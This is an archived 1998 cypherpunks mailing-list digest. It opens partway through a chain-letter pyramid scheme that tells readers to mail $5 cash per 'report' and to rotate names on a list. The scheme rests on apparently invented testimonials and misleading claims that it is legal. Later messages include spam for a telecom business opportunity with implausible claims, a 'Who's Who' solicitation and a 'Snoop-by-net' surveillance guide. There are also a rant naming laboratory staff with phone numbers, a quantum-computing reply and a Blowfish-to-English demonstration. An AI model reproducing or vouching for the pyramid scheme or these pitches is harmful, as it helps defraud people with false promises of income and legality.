hard is emailing! The products in this program are a series of 
four business and financial reports costing $5.00 each.  Each 
order you receive is to include:
  * $5.00 cash United States Currency
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they 
    ordered.

To fill each order, you simply e-mail the product to the buyer.
THAT'S IT! The $5.00 is yours!  This is the EASIEST electronic 
multi-level marketing business anywhere! 

FOLLOW THE INSTRUCTIONS TO THE LETTER AND BE PREPARED TO REAP THE 
STAGGERING BENEFITS!   

       ******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell 
   them if you don't order them).
*  For each report, send $5.00 CASH, the NAME & NUMBER OF THE
   REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
   RETURN POSTAL ADDRESS (in case of a problem) to the person 
   whose name appears on the list next to the report.
*  When you place your order, make sure you order each of the 
   four reports.  You will need all four reports so that you can 
   save them on your computer and resell them.
*  Within a few days you are to receive, via e-mail, each of the 
   four reports. Save them on your computer so they will be 
   accessible for you to send to the 1,000's of people who will 
   order them from you.

2. IMPORTANT-- DO NOT alter the names of the people who are 
   listed next to each report, or their sequence on the list, in 
   any way other than is instructed below in steps "a" through 
   "d" or you will lose out on the majority of your profits.Once 
   you understand the way this works, you'll also see how it 
   doesn't work if you change it.  Remember, this method has been 
   tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, replace the name 
        and address under REPORT #1 with your name and address, 
        moving the one that was there down to REPORT #2.

    c.  Move the name and address that was under REPORT #2 down 
        to REPORT #3.

    d.  Move the name and address that was under REPORT #3 down 
        to REPORT #4.

    e.  The name and address that was under REPORT #4 is removed 
        from the list and has NO DOUBT collected large sums of 
        cash!

Please make sure you copy everyone's name and address ACCURATELY!
        
3. Take this entire letter, including the modified list of names, 
   and save it to your computer.  Make NO changes to the 
   instruction portion of this letter.

4. Now you're ready to start an advertising campaign on the
   WORLDWIDE WEB!  Advertising on the WEB can be very, very 
   inexpensive, and there are HUNDREDS of FREE places to 
   advertise. Another avenue which you could use for advertising 
   is e-mail lists. You can buy these lists for under $20/2,000 
   addresses or you can pay someone to take care of it for you.

     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5. For every $5.00 you receive, all you must do is e-mail them 
   the report they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY 
   SERVICE ON ALL ORDERS!  This will help guarantee that the 
   e-mail THEY send out, with YOUR name and address on it, will 
   be prompt because they can't advertise until they receive the 
   report!  To grow fast be prompt and courteous.

------------------------------------------
AVAILABLE REPORTS
------------------------------------------
**Order each Report by number and name**
Notes:
-  ALWAYS SEND $5 CASH FOR EACH REPORT
-  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY
-  Make sure the cash is concealed by wrapping it in at least two 
   sheets of paper 
-  On one of those sheets of paper, include: (a) the number & 
   name of the report you are ordering, (b) your e-mail address, 
   and (c) your postal address.
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER 
REPORT #1 FROM:
            L. Smith
            7082 Woolworth Rd.
            Shreveport, Louisiana 71129
_________________________________________________________________ 
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER 
REPORT #2 FROM:
            BUBBA C.
            PO BOX 18424
            SHREVEPORT, LA. 71138
_________________________________________________________________ 
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS" ORDER 
REPORT #3 FROM:
             SDS
             2536 LEXINGTON DR.
             LA PLACE, LA. 70068
_________________________________________________________________ 
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER 
REPORT #4 FROM:
             THE D AND S CO.
             P.O. BOX 3293
             CHANDLER,AZ. 85244-3293
_________________________________________________________________ 
 
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
-----------------------------------------------------------------

Let's say you decide to start small just to see how well it 
works. Assume your goal is to get 10 people to participate on 
your first level.  (Placing a lot of FREE ads on the internet 
will EASILY get a larger response.)  Also assume that everyone 
else in YOUR ORGANIZATION gets ONLY 10 downline members.  Follow
this example to achieve the STAGGERING results below.
        
1st level--your 10 members with 5 = $50
2nd level--10 members from those 10 ($5 x 100) = $500
3rd level--10 members from those 100 ($5 x 1,000) = $5,000
4th level--10 members from those 1,000 ($5 x 10,000) = $50,000
THIS TOTALS ----------->$55,550

Remember friends, this assumes that the people who participate 
only recruit 10 people each.  Think for a moment what would 
happen if they got 20 people to participate!  Lots of people get 
100s of participants!  THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely 
you can afford $20).  You obviously already have an internet 
connection and e-mail is FREE!!!

REPORT#3 shows you the most productive methods for bulk e-mailing 
and purchasing e-mail lists.  Some list & bulk e-mail vendors 
even work on trade! 
        
About 50,000 new people get online every month!

*******TIPS FOR SUCCESS********
TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow 
the directions accurately.
  
*  Send for the four reports IMMEDIATELY so you will have them 
   when the orders start coming in because: When you receive a $5 
   order, you MUST send out the requested product/report to 
   comply with the U.S. Postal & Lottery Laws, Title 8,Sections 
   1302 and 1341 or Title 18,  Section 3005 in the U.S. Code, 
   also Code of Federal Regs. vol. 16, Sections 255 and 436, 
   which state that "a product or service must be exchanged for 
   money received."

*  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

*  Be patient and persistent with this program. If you follow the 
   instructions exactly, the results WILL undoubtedly be 
   SUCCESSFUL!

*  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

*******YOUR SUCCESS GUIDELINE*******
Follow these guidelines to help assure your success: If you don't 
receive 10 to 20 orders for REPORT #1 within two weeks, continue
advertising until you do.  Then, a couple of weeks later you 
should receive at least 50 orders for REPORT #2.  If you don't, 
continue advertising until you do.  Once you have received 50 or 
more orders for REPORT #2, YOU CAN RELAX, because the system is 
already working for you, and the cash can continue to roll in!
THIS IS IMPORTANT TO REMEMBER: Every time your name is moved down 
on the list, you are placed in front of a DIFFERENT report.  You 
can KEEP TRACK of your PROGRESS by watching which report people 
are ordering from you.  If you want to generate more income,
send another batch of e-mails and start the whole process again! 
There is no limit to the income you will generate from this 
business!

NOTE:  If you need help with starting a business, registering a 
business name, how income tax is handled, etc., contact your 
local office of the Small Business Administration (a Federal 
agency) for free help and answers to questions.  Also, the 
Internal Revenue Service offers free help via telephone and free 
seminars about business taxes.  This letter has been edited to 
help comply with the Federal Trade Commission requirements.  Any 
amounts of earnigs listed in this leter can be factual or 
ficticous.  Your earnings and results are highly dependant on 
your activities and advertising.  This letter constitutes no 
guarantees stated nor implied.  In the event that it is
determined that this letter constitutes a guarantee of any kind, 
that guarantee is now void.  If you have any question of the 
legality of this letter contact the Office of Associate Director 
for Marketing Pratices Federal Trade Commission Bureau of 
consumer Protection in Washington DC.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

This program does work, but you must follow it EXACTLY! 
Especially the rule of not trying to place your name in a 
different position, it won't work and you'll lose a lot of 
potential income.  I'm living proof that it works. It really is a 
great opportunity to make relatively easy money, with little cost 
to you.  If you do choose to participate, follow the program 
exactly, and you'll be on your way to financial security.
                                 Sean McLaughlin, Jackson, MS    
 
I just want to pass along my best wishes and encouragement to
you.  Any doubts you have will vanish when your first orders come 
in.  I even checked with the U.S. Post Office to verify that the 
plan was legal.  It definitely is!  IT WORKS!!!
                                  Paul Johnson, Raleigh, NC

The main reason for this letter is to convince you that this 
system is honest, lawful, extremely profitable, and is a way to 
get a large amount of money in a short time.  I was approached 
several times before I checked this out.  I joined just to see 
what one could expect in return for the minimal effort and money required.  To my astonishment, I received $36,470.00 in the
first 14 weeks, with money still coming in.
                       Sincerely yours, Phillip A. Brown, Esq.

Not being the gambling type, it took me several weeks to make up 
my mind to participate in this plan.  But conservative that I am, 
I decided that the initial investment was so little that there 
was just no way that I wouldn't get enough orders to at least get 
my money back.  Boy, was I surprised when I found my medium-size 
post office box crammed with orders!  For a while, it got so 
overloaded that I had to start picking up my mail at the window. 
I'll make more money this year than any 10 years of my life 
before. The nice thing about this deal is that it doesn't matter 
where in the U.S. the people live. There simply isn't a better 
investment with a faster return.
                                 Mary Rockland, Lansing, MI

        
I had received this program before. I deleted it, but later I 
wondered if I shouldn't have given it a try. Of course, I had no 
idea who to contact to get another copy, so I had to wait until I 
was e-mailed another program...11 months passed then it came...I 
didn't delete this one!...I made more than $41,000 on the first 
try!!
                                    D. Wilburn, Muncie, IN

This is my third time to participate in this plan. We have quit 
our jobs, and will soon buy a home on the beach and live off the 
interest on our money. The only way on earth that this plan will 
work for you is if you do it. For your sake, and for your 
family's sake don't pass up this golden opportunity. Good luck 
and happy spending!
                                Charles Fairchild, Spokane, WA

You have great potential for extra earnings that is available at 
your finger-tips!  You have unlimited access to wealth, but you 
must be willing to take that first step!

ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO 
FINANCIAL FREEDOM!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Fri, 14 Aug 1998 22:00:07 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Dennis Rodman hounded by porn stars/Mom dates alien son http://stuffed.net/98/8/14/
Message-ID: <19980815001313.6841.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/14/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zey69@uvm.haifa.ac.il (Pacific Coast Mail Order)
Date: Fri, 14 Aug 1998 16:43:27 -0700 (PDT)
To: zey69@uvm.haifa.ac.il
Subject: Mail  Order  Condoms....convenient!
Message-ID: <199808141954KAA15143@Rusruir.coleurop.be>
MIME-Version: 1.0
Content-Type: text/plain



Discreet.....

                      

                            MAIL ORDER CONDOMS!
                     
                 DISCREETLY PACKAGED, CONVENIENT,  FAST DELIVERY!


  PACIFIC COAST MAIL ORDER  Products is now offering ..........
               
                      TROJAN.... AMERICAS #1 BRAND 

  of condoms available discreetly by MAIL ORDER! We FEATURE the 
  most popular style..... 
                        
        

        **** TROJAN-ENZ with spermicidal lubricant! ****

   


   Having condoms EASILY AVAILABLE is essential,
   YET many people do not carry them for VARIOUS reasons.

   Many people are EMBARRASSED to purchase condoms,
   while others do not have easy access to QUALITY condoms.


 WOMEN IN PARTICULAR are
 embarrassed to purchase condoms,
 but many wish to carry them.


 TEENAGERS are especially at risk of sexually transmitted disease
 and unwanted pregnancies as they often do not have easy access 
 to quality condoms.
 

 Regardless of the reason for not having condoms when needed you
 are not only putting yourself, but others in danger of DISEASE and 
 UNWANTED PREGNANCY.


   

           Be Responsible!   Be Safe!   BE Sensible!   

  

 Our research indicates that the #1 SELLING CONDOM IS....
                        
         **** TROJAN-ENZ with spermicidal lubricant! ****

PACIFIC COAST MAIL ORDER is featuring packages of 12 condoms
with 2 additional condoms free (while supplies last, subject 
to change without notice) and will be shipped in DISCREET packaging 
the day your order is received! 




                 
                      DISCREETLY PACKAGED!

                      PROMPT DELIVERY!

                      GREAT PRICE!




PLEASE PRINT AND COMPLETE THE FOLLOWING ORDER: 

______ # OF PACKAGES FOR ONLY    $ 8.99 EACH.

______ SHIPPING and HANDLING       $ 2.00 EACH

______ Ca. Residents only (tax)          $   .72 EACH



Mail To:

Name                 ___________________________

Address           ____________________________

City,State,Zip _____________________________///



Please Send Check or Money Order to:

Pacific Coast Mail Order
862 Sir Francis Drake Blvd.  #352
San Anselmo,Ca.
94960


Please allow 14 days or for delivery.

Your order will arrive discreetly packaged! 

    


** To be removed from our mailing list please reply to: plsrmv@hotmail.com
   
    Thank You, 
    Jane P. 

            



 



















*
*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tnet1@prodigy.net
Date: Fri, 14 Aug 1998 13:23:47 -0700 (PDT)
To: tnet1@prodigy.net
Subject: Who is who
Message-ID: <199808142019.EAA00619@hydra.gov.sg>
MIME-Version: 1.0
Content-Type: text/plain


This is a responsible email being sent by AC Enterprises.  1055 Stewart
Ave., Bethpage , NY 11714.  Tel. (516) 937-9001. Email
tnet1@prodigy.net.  The above statement complies with section 301
requirements relating to transmissions of unsolicited commercial
electronic mail.  To remove your name from our list immediately, please
email: tnet1@prodigy.net with remove as the subject.  We maintain our
lists responsibly, and apologize for any inconvenience.


Dear Candidate,

You were recently nominated by The Office of Public Affairs for a free
listing in The Kensington Who's Who Directory.

http://www.gwh.net/~kensing/

Our Public Affairs Office gathers information from many recognized
sources, including professional associations and societies, trade
organizations, newspaper and magazine articles, professional reference
publications, web presence, and referrals from existing members.

As a highly respected professional in your field of expertise, we
believe your contributions merit very serious consideration for
inclusion in The Kensington Who's Who Directory.

To maintain the level of accuracy, we ask you to click on the web
address highlighted below and fill out the brief bit of information
required for inclusion.

There is no cost or obligation to be listed in The Kensington Who's Who
Directory.  All applicants will receive a free gift compliments of
Kensington Who's Who.

http://www.gwh.net/~kensing/

My Sincere Thanks,

Lisa Narod
Office Of Public Affairs









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 15 Aug 1998 12:50:32 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Aliens built 750 foot plonker/Man plays todger like a guitar http://stuffed.net/98/8/15/
Message-ID: <19980815080001.15401.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/15/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 15 Aug 1998 08:11:26 -0700 (PDT)
To: j orlin grabbe <gbroiles@netbox.com
Subject: Other Hagengruber fun with taxpayers' money
Message-ID: <35D5A406.5488@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Saturday 8/15/98 8:04 AM

J Orlin Grabbe

I read  Nuclear BIOS

                             Sandia Scraps Guided Nuke Project

                               We were just having fun, Hagengruber says

      Sandia National Laboratories has shut down an effort to design a
guided nuclear bomb that critics       say was aimed at Third World
targets. 
     
     Sandia pulled the plug because of controversy over the fact that
the lab never received permission       for the project from senior
levels of the Clinton administration, said Sandia vice president
Roger       Hagengruber. 

     A flight test scheduled for next month in which an unarmed
prototype was to have been dropped from       an airplane has been
canceled, Hagengruber said, and lab scientists will wrap up their
reports on        their four-year work on the project by the end of
September. 

     Critics said the $15.5 million project was intended to give U.S.
military forces a new kind of           nuclear bomb that could be used
in conflicts against small nations trying to acquire nuclear,           
biological or chemical weapons. ...

http://www.aci.net/kalliste/

At the height of implementing the seismic data authenticator 
http://jya.com/da/whpda.htm based on NSA's
deficient algorithm.  See Appendix S http://jya.com/da/whpda.htm#apps I
SQUANDERED about $50k
EACH WEEK on a flawed concept based and a deficient algorithm.

My ROUGH guess that I WROTE OVER $250,000 in purchase orders for the
Sandia seismic data authenticator! 

This amount DID NOT INCLUDE MY SALARY, a TECHNICIAN, and Travel.

  The first implementation was done in 1974, by R. E. D. Stewart, D. A.
Reynolds, and J. G. Deasey. This   was a "bench test" implementation in
the sense that the algorithm was done in hardware wire, wrapped on  
"cash" cards, and placed in a test rack. http://jya.com/da/whpda.htm

Reynolds and Deasy did the work.  Stewart was one of Hagenguber's spook
shop [building 868] employees.  

Stewart merely wrote the report.  

Stewart wrote that the cost of the prototype was $400,000 if my memory
is correct.  The money came from
outside Sandia, perhaps NSA or DARPA.

I was ordered by project leader H B Durham to hold the cost down.

I was also ordered by Durham follow NSA's orders.

Durhams exact words were

   If they want a pink overcoat, sell them a pink overcoat.

I KNEW while I was doing the work that both the data authentication
concept was flawed - multiple
redundant stations is the correct AND CURRENTLY IN USE concept - and the
algorithm was BAD.

So did Durham from what he told me.  

Durham regarded the data authenticator as a necessary political evil,
was my opinion.

Durham's boss was John Holovka.  Holovka's boss was Paul Stokes.

Stokes told me that the concept of data authentication was invented at
Sandia and that he, Stokes, invented it.

Stokes ordered the data authenticator fielded over the classification
objections of NSA.

Stokes boss was ROGER HAGENGRUBER.

I've been involved with shift register implementation work for a LONG
TIME.

  It has been over about 27 years since I directed any Ph.D. students

  http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html     
  http://www.friction-free-economy.com/
  http://www.mhpcc.edu/general/john.html

So I documented the bad NSA algorithm and implementation advice. 
http://jya.com/da/whpda.htm

My SAND report cost A LOT OF MONEY to produce for the REPORT ALONE.

But NOT ALL OF THE MONEY WAS WASTED.

1 
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
2  http://jya.com/f86/whpf86.htm

The seismic data authenticator is ANOTHER OF   ROGER HAGENGRUBER'S   
PROJECTS

Later
bill


Friday 8/14/98 9:06 AM

John Young  http://www.jya.com/index.htm
J Orlin Grabbe  http://www.aci.net/kalliste/

Roger Hagengruber is making news

http://www.abqjournal.com/scitech/1sci8-14.htm

Hagengruber

1  was Jim Durham's office mate when Hagengruber was new at Sandia.
   
   H. B. Durham who served as project leader  
   http://jya.com/da/whpda.htm

2  was C William Childers' boss

3  was James Gosler's boss

4  was Paul Stokes' boss

  Originator: Paul A. Stokes Date: 4/28/92 http://jya.com/da/whpda.htm

5  encouraged Sandia to do more 'work for others' projects like for 
   the FBI and NSA.

   This includes the 'spiking work' for NSA.   
   
   http://www.aci.net/kalliste/ricono.htm 
   http://www.qainfo.se/~lb/crypto_ag.htm     
   http://caq.com/cryptogate
  
6  told employees that Hagengruber favored shifting Sandia labs from
   DOE control to DOD control.

7  was one of the main people involved in getting me fired and 
   CAUSING THIS MESS.	

   http://www.aci.net/kalliste/speccoll.htm
   http://www.aci.net/kalliste/nukearse.htm
   http://www.aci.net/kalliste/sandcryp.htm
   http://jya.com/whpfiles.htm

8 Hagengruber looks like he may have relative working at Sandia

  HAGENGRUBER,MICHAEL L.    (505)844-0628  MLHAGEN   (505)844-7284 
0121  
  HAGENGRUBER,ROGER L.      (505)844-7310  RLHAGEN   (505)844-1424 
1231   
  http://www.sandia.gov/cgi-bin/emplloc?ename=hagengruber

This matter CLEARLY should be settled before it GETS WORSE!

Later
bill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jhuy87ik@yahoo.com
Date: Sat, 15 Aug 1998 13:15:18 -0700 (PDT)
To: <curt@toad.com>
Subject: I have seen the future...
Message-ID: <199808152015.NAA08590@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is the information that you requested concerning your 
attendance at the last Computer/Internet Expo or when you 
purchased the software from one our business affiliates.



I HAVE SEEN THE FUTURE
And it will change your world soon...       
 
I receive a lot of telephone calls.  All of them interesting-some 
of them fascinating. Seldom though, do I receive a call that
I would truly refer to as "compelling." 

That is, of course, until my phone rang about 3 weeks ago. 
I still can't believe it. Odd call. 
Gentleman wanted some information-specific information.
Of course I had a few questions that I needed answered first.

"What's the product?"
"Can't tell you," came a rather hollow reply.
"Can't tell me? Why not?"  I pressed, becoming increasingly 
more curious-and irritated-by the moment.
Seeming to change the subject he said, "We want you to come 
take a look, and give us your opinion."
"Come where? And give you my opinion on what?"
"We'll send you a plane ticket."

Three days later, I found myself staring out the window 
of that early morning Delta flight as we made our final approach, 
wondering what in the world I have got myself into.

Met with the founders and the young man who had 
invented the technology. I guess it was about 
55 minutes into the presentation that I 
understood what these guys were up to,
and the profound effect this was going to have
upon the world-our world.  

While I sat there riveted on the CEO's every word, 
transfixed by the passion emanating from his steel blue eyes, 
I felt like some character in a spy novel, 
conspiring on a plot to overthrow the government.  
One day, I'll tell you the whole story.      

What you ask could have such a profound effect upon our world?


THE TOTAL DESTRUCTION OF THE TELE-COMMUNICATION INDUSTRY
AS IT CURRENTLY EXISTS!!

I've recently been invited to the high technology company 
discussed above. It is a new publicly traded company.
It will be the Microsoft of the telephone industry. 
It is extremely well funded and has patented high technology.

The proprietary technology is the most significant advance 
in over 100 years of tele-communications. 
Protected by 2 patents covering 48 applications,
we have a private network infrastructure at a pre-opening 
investment of approximately 23 million dollars. 
We are not re-sellers of Long Distance time; rather a 
direct competitor to AT&T and  others.

To illustrate the potential of this proprietary technology: 
the internal cost of AT&T to complete a call is calculated
at approximately 3 cents per minute; 
MCI and Sprint the second and third largest competitor based on 
cost of approximately 4 cents per minute.  
Our private network "compression technology" can accomplish 
the same call for as little as 2/ 100th of a cent per minute.  

For example, AT&T and MCI just announced they were going to 
cut their basic rates by 5% during the daytime and 15% during 
the nighttime. On a 15 minute coast to coast call AT&T's 
new price will be $4.65 during the day for their 
average customer, our regular price to every customer 
every day (24 hours per day, 7 days per week) is $1.18.  
We can afford to beat AT&T pricing because of our technology.  

But you ask, do I have to use any special equipment. 
Absolutely not.  Just pick up the phone and call the party
you want to reach. Pricing is only the tip of the iceberg 
with our new technology.  Our multimedia products are going 
to make your life so much easier. Star Trek is here, 
right now and our smart communications platform will bring it to 
you.  
AT&T, MCI, and Sprint, look out there is a new major player in 
town.

We will only work with a limited number of individuals to launch
this company. If you think you have what it takes or have
proven that you do, do not wait a moment longer. This is a 
ground floor business opportunity, with a compensation package
potentially 300% more lucrative than our nearest competitors. 

Would you agree I have something here that spells opportunity? 
If yes, we need to talk further, immediately.
     
Call for information and cassette 1-800-741-6240
Please Leave your name and telephone number and the best time to 
reach you.

************************************************************
Removal Instructions...
It is in no way my intention to send anything to anyone 
who is not interested in the information; 
If you would like to receive future updates, 
simply called 1-800-741-6240
and indicate your name, address, and telephone number 
 Please complete all information.
If we do not hear from you, you will be automatically 
removed from future updates and will not be contacted again.
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 15 Aug 1998 12:08:52 -0700 (PDT)
To: coderpunks@toad.com
Subject: Re: quantum problem suggestions?
In-Reply-To: <35CF84B2.72A@accessdata.com>
Message-ID: <3.0.5.32.19980815115529.007dfce0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:39 PM 8/10/98 -0600, Mike Stay wrote:
>I'm looking for a problem in cryptogrpahy that might be solvable (or at
>least, done faster) on a quantum computer that hasn't been treated yet. 
>Any suggestions?
>-- 
>Mike Stay


No, but you may be interested in: 
_Science_ Vol 281 7 Aug 98 p 793
"Abrams et al. have shown that if there was 
even the slightest amount of nonlinearity in
quantum mechanics, no matter what, it would be possible to modify the
amplitude amplification scheme of quantum search to obtain an efficient
algorithm for NP-complete problems"

The Abrams ref is D. Abrams et al, quant-ph/9801041
	
The article ends with perhaps the understatement of the millenia:
"It is possible that one of these might result in an algorithm that could
solve NP complete problems.  Such a solution would greatly increase the
interest in building a quantum computer."


**
"Why is my computer not faster?" asked the gardener.
"Turn the spigot" said the engineer, pointing to the valve
at the far end of the hose which the gardener held.
The gardener did so, and shortly thereafter felt the hose stiffen.
With that, the gardener was enlightened.



  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 15 Aug 1998 08:05:12 -0700 (PDT)
To: remailer-operators@anon.lcs.mit.edu
Subject: Re: pool size
In-Reply-To: <199808151441.PAA04162@server.eternity.org>
Message-ID: <199808151502.RAA14137@replay.com>
MIME-Version: 1.0
Content-Type: text



URL: http://personal.sip.fi/~lm/c2txt2c/

Problem:

There is problem with free speech in the USA: 
Judge Gwin of the Federal District Court of the Northern District of Ohio
has recently held that software is not protected by the First Amendment
because it is a ``functional device'' like a telephone circuit. 

Demonstration that C source is speech:
I made a program that translates C-source for Blowfish cryptographic
algorithm to English.


Comment by author: "********************blowfish.h*******************".
Comment by author: " $Id: blowfish.h,v 1.3 1995/01/23 12:38:02 pr Exppr $".
There is Robert code named "MAXKEYBYTES" who has 56 leafs. Comment by
author: " 448 bits ".
There is William code named "bf_N" who has 16 leafs.
There is Edward code named "noErr" who has 0 leafs.
There is Richard code named "DATAERROR" who has -1 leafs.
There is Michael code named "KEYBYTES" who has 8 leafs.
This rugged Charles code named "subkeyfilename" says "Blowfish.dat"
any time he has chance.
>From here I'm assuming that melons are about same size as coconuts.
>From here I'm assuming that apples are about same size as oranges.
>From here I'm assuming that cherries are about same size as strawberries.

Thats was all things related to that thing.
Comment by author: " ORDER_BADC ".

There exist process named "opensubkeyfile". Process should takes these
things as input: nothing. That process usually produces tomatoes. I will
tell later more about that process.

There exist process named "F". Process should takes these things as input:
Donald code named "x" liking coconuts. That process usually produces
coconuts. I will tell later more about that process.

There exist process named "Blowfish_encipher". Process should takes these
things as input: location of Ronald code named "xl" liking coconuts and
location of Allen code named "xr" liking coconuts. That process usually
produces nothing. I will tell later more about that process.

There exist process named "Blowfish_decipher". Process should takes these
things as input: location of Ronald code named "xl" liking coconuts and
location of Allen code named "xr" liking coconuts. That process usually
produces nothing. I will tell later more about that process.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Newsletter26@hotmail.com
Date: Sat, 15 Aug 1998 16:46:02 -0700 (PDT)
To: Newsletter26@hotmail.com
Subject: Snoop by net
Message-ID: <QQfcpj20300.199808152345@pop0-alterdial.uu.net>
MIME-Version: 1.0
Content-Type: text/plain


They can get your password
They can tap into your answering machine & use it to listen into
your live conversation or listen to your messages.
They can  read your email and even use your phone line to go online. 
They can decode the phone number you are dialing in seconds.
They can dig up the dirt and secrets on anyone   All from the Internet

They know the back end of AOL and use its secrets to have fun on the Internet.

They can fax for free and place calls for free...   

How?
It's all too easy and we'll show you how they do it so that you can protect yourself.

Snoop-by-net reveals all.

They snoop on their friends, their boss, or their enemies...
Learn how they take full advantage of the Internet.  
You'll be shocked.

We'll show you where they go in order to uncover the dirt on everyone
just by using the Internet.

Use these secrets to protect yourself and do research on employees
or your new date.

Know where your friends are online, where they have been 
Track down people using only their email address
Research employees, loved ones, teachers, or your neighbors...
do they have a criminal record,  have they ever been pulled over for speeding, 
are they using a fake social security number?

We will teach you how you can quickly find out even personal information
about anyone.

Join the people who have already read our publication 
and learn how to turn your Internet connection into a super SNOOP machine.

Act now and get your Super Spy Links for free.  (order before 08/20/98)

Super Spy Links offers an exhausting look at how you are
just a couple of mouse clicks away from finding out just about 
every bit of public information on someone, along with some 
scary personal information as well.


ORDER NOW:  to learn just how powerful the Internet really is.

Snoop-by-net is only $19.95 + 4.00 Shipping & Handling.   

Make check or money order payable to 

CellTalk 
P.O. Box 1084
Murray Hill Station
New York, NY  
10156

We will ship first class mail the same day.

or... FAX your order for faster delivery !!!

Please print and fill out each line legibly.

{ } Visa { }Mastercard  (Please check one)

CC# ______________________________________________

Expiration Date: ____________________________

Name on card:  ___________________________________

Billing  Address (Must match credit card billing address:)

___________________________________________

__________________________________________________________

Zip Code _______________________

**  Zip code must match the billing address of credit card

Shipping Address

__________________________________________________________

__________________________________________________________

Zip: __________________________


Signature:_____________________________________________________


Phone Number with area code:  ___________________________________

E-Mail Address: ____________________

Your credit card will be billed for $19.95 plus $4.00 Shipping & handling 


Fax this CREDIT CARD offer to (212) 290-8009 for instant ordering







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 16 Aug 1998 00:17:32 -0700 (PDT)
To: Frederick Burroughs <riburr@shentel.net>
Subject: Re: CLINTON/STARR SCRAMBLED
In-Reply-To: <35D67BED.E5E9656C@shentel.net>
Message-ID: <3.0.5.32.19980816001546.00a88b10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>Anonymous wrote:
>
>> One of the hottest telecasts in American history will be scrambled
>with the
>> latest encryption technology and put on a special fiber-optic line
>from the
>> White House to the courtroom, the DALLAS MORNING NEWS reports in
>Thursday
>> editions.

They were going to use a safer, though less interactive technology,
but fortunately some WhiteHouse staffer realized that _somebody_
out there would make a joke about "Sex, Lies, and Videotape"
and it'd be all over for Slick Willy...


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 16 Aug 1998 12:48:49 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Man with two dicks keeps one 'under his hat'/I married Marilyn Monroe's ghost http://stuffed.net/98/8/16/
Message-ID: <19980816080001.10590.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/16/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



